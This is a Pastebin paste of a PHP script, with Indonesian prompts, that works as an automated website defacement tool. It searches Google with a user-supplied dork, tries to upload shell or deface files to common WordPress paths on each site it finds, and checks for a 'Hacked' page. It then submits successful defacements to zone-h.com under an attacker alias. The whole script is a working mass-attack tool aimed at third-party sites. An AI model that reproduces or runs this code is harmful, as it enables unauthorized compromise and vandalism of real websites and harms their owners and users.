Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- class auto{
- private $url;
- private $dork;
- private $log=null;
- function __construct($file=null){
- echo "/*simple scanner dan uploader*/\n\n";
- echo "[+]Masukkan Dork: ";
- $fp = fopen("php://stdin", "rb");
- $dork = fgets($fp);
- $dork = str_replace(array("\n", "\r", "\r\n"), "", $dork);
- echo "[+]Masukkan jumlah situs yg discan: ";
- $total = fgets($fp);
- $total = str_replace(array("\n", "\r", "\r\n"), "", $total);
- fclose($fp);
- $this->dork = $dork;
- $this->total = $total;
- $this->log = $file;
- $this->scan();
- }
- function match($start, $end, $var){
- return preg_match_all("{".preg_quote($start).'(.*?)'.preg_quote($end)."}is", $var, $m) ? $m[1] : null;
- }
- function curl($dork=null, $x, $url=null){
- $ch = curl_init();
- if($dork != null && is_numeric($x)){
- curl_setopt($ch, CURLOPT_URL, "http://www.google.com/custom?q=".urlencode($dork)."&btnG=Search&start=".urlencode($x));
- }elseif($url != null && $x==null){
- curl_setopt($ch, CURLOPT_URL, $url);
- }
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_AUTOREFERER, true );
- curl_setopt($ch, CURLOPT_FAILONERROR, true);
- $exec = curl_exec($ch);
- curl_close($ch);
- return $exec;
- }
- function save($url){
- if($this->log != null){
- $fp = @fopen($this->log, "a") or die("cant open file");
- fwrite($fp, $url);
- fclose($fp);
- }else return false;
- }
- function parse($urls){
- for($a=0; $a<count($urls); $a++){
- $dev = parse_url($urls[$a]);
- @$scheme[] = $dev['scheme'];
- @$host[] = $dev['host'];
- }
- $unik = array_unique($host);
- foreach($unik as $key=>$url){
- $urls_[] = $scheme[$key]."://".$url;
- }
- return $urls_;
- }
- function waktu($start){
- $end = time() - $start;
- $detik = round($end);
- echo "\n~selesai dalam {$detik} detik\n";
- }
- function scan(){
- $start=0;
- $total=0;
- $mulai = time();
- do{
- $i=0;
- $data = $this->curl($this->dork, $start);
- $urls = $this->match('<a class="l" href="', '" onmousedown="', $data);
- if($urls==null){
- echo "~hasil tidak ada\n";
- $this->waktu($mulai);
- exit;
- }
- $urls_ = $this->parse($urls);
- $count = count($urls_);
- if($count==0){
- echo "hasil tidak ada atau ada halangan captcha :p\n~keluar";
- $this->waktu($mulai);
- exit;
- }
- do{
- $urlq = $urls_[$i];
- $scan = $this->curl(null, null, $url_);
- echo $urlq;
- echo "\n";
- echo "-> Wait...";
- $uploadfile="gan.php";
- $ch = curl_init("$urlq/wp-content/uploads/products_img/gan.php");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,
- array('file3'=>"@$uploadfile"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_COOKIEFILE, "coker_log");
- $postResult = curl_exec($ch);
- curl_close($ch);
- $uploadfile="gan.php";
- $ch = curl_init("$urlq/wp-content/themes/k.php");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,
- array('file3'=>"@$uploadfile"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_COOKIEFILE, "coker_log");
- $postResult = curl_exec($ch);
- curl_close($ch);
- $uploadfile="pepes.php";
- $ch = curl_init("$urlq/wp-content/k.php");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,
- array('file3'=>"@$uploadfile"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_COOKIEFILE, "coker_log");
- $postResult = curl_exec($ch);
- curl_close($ch);
- $admin1 = $this->curl(null, null, $urlq."/k.php");
- if(preg_match('#Hacked#is', $admin1)){
- echo "\n";
- echo "Deface: ";
- echo $urlq."/k.php";
- echo "\n";
- echo "Zone-h: ";
- $zh = $urlq."/k.php";
- $ch8 = curl_init ("http://www.zone-h.com/notify/single");
- curl_setopt ($ch8, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch8, CURLOPT_POST, 1);
- curl_setopt ($ch8, CURLOPT_POSTFIELDS, "defacer=ID-IM&domain1=$zh&hackmode=1&reason=1"); // here put ur name on zone-h
- if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch8))){
- echo " Ok "."\n\n";
- }else{
- echo " No"."\n\n"; }
- curl_close ($ch8);
- }
- else {
- echo "Site Tidak Terdeface";
- echo "\n";
- }
- $total++;
- $i++;
- }while($i<$count && $total<$this->total);
- $start=$start+10;
- }while($total<$this->total);
- $this->waktu($mulai);
- }
- }
- $gay = new auto("Vuln_Shell_ngkjelas2.txt");
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement